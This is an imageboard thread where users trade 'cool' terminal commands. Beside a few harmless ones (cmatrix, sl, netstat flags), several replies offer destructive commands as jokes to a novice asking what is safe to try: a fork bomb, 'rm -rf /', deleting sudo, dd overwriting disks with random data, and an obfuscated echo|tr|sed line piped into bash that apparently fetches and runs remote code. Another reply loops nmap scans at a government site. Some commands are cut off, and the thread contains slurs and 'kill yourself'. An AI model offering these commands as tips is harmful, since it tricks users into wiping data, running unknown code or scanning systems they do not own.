What are some cool terminal commands?

What are some cool terminal commands?


Download cmatrix you gigantic poser/low effort troll.

sudo shutdown now
give it a try

:(){ :|:& };:


for((i=0;;i++)) { printf "%$(bc -l

perl -e 'map{my$qw;map{!$q[$_]&&rand>.993?do{$q[$_]=${[qw$Just another Perl hacker$]}[$qq++].q$.$x5 .q$ $x5;$qq=$qq>3?0:$qq}:0;$q[$_]?do{($qx, $q[$_])=split//,$q[$_],2;$qw.=$qx}:{$qw.=q$ $}}1..70;;print$qw,$/;select$a,$a,$a,.06}1..300'

sudo rm `which sudo`
I have no idea if this works, but it would be hilarious. Might be worth trying for shits and giggles if I get my hands on a machine I intend to wipe anyway.

is literally the only command you need to know.

It works. Running that command removes sudo.

you fucking sexist misogynist pig

Zelda music on the PC speaker:

sudo $(xxd -r -p

tip top kek

epileptic xorg
while :; do xrandr --output $(xrandr | awk '/ connected/ { print $1 }') --gamma 0.$((RANDOM%9)):0.$((RANDOM%9)):0.$((RANDOM%9)); done
turn the colors back to normal
xrandr --output $(xrandr | awk '/ connected/ { print $1 }') --gamma 0:0:0

sudo killall

What happens if you kill init? I'm guessing kernel panic, but I don't want to learn the hard way.

It'll trap and ignore those signals by design. But, if you attempt to kill systemd, it'll re-exec.

sudo rm -r /

why is it kinda scary to read this?

what does this do?

while :; do eject; done

( ° ʖ °) Do it...

it shouldn't be, it's a cool feature. it means that you can upgrade systemd in-place. package managers use the re-exec command but killing it works just as well.

very creative
xxd -p -r

Fork bomb


okay which of these can I actually try without bricking my computer? (I'm on linux)

this one is fun


cool shit! I wish I had epilepsy that'd be pretty cool.

Kill signals are an accepted way to communicate in Unix. The default signal, SIGTERM, is usually interpreted as a polite request to exit, but since exiting init tells the kernel to shut down it does something less drastic instead. If you want to violently murder a process you can use SIGKILL/-9, which can't be blocked.

while :; do nmap -A cia.gov; sleep 2; done

-rm -rf
also >>>Holla Forums


You can't send signals to PID1 except those it has explicit handlers for in Linux. It just traps and ignores. Which means, you can't term or kill PID1, unless it allows you to. systemd, in the case if SIGKILL, just re-execs. Everything else ignores that signal.

If you really wanted to, you could kill it with a segmentation fault signal, which will indeed result in a kernel panic.

does this really work?

Yeah, it's pretty cool. Make sure you have alsa or pulseaudio though. Give it a try.




Do not execute a terminal command that you don't fully understand if you don't want to face some unforseen consequences.

sudo su
rm -rf /

fuck off cunt

kill yourself

sudo dd if=/dev/random | tee >(dd of=/dev/sda) >(dd of=/dev/sdb) >(dd of=/dev/sde) &

man woman
Doesn't work.
man man
Fucking faggot system.


tr a-y \\40c-z

forever alone, this one.

On my computer (gentoo openrc), even with -KILL it doesn't work (nothing happens). Perhaps I need -SEGV. idk

C-h f manC-h f woman

Depends on the OS

Spent over 9000 hours crafting this one:
echo 'carl the moongeek/o.lye10uA8/C' | tr gnu/homekat :phisth/bu\\- | sed s./.L. | bash | bash

holy shit dude time well spent

he does, that's why he called it a faggot system


df -h


This isn't /a/

What are you guys using with neststat?
now i'm happy with
netstat -puct

I use -tunlp
most people I know user -tupan

oh shit, I read "netstat"

sl -l

try it friend no typo

deprecated, use ss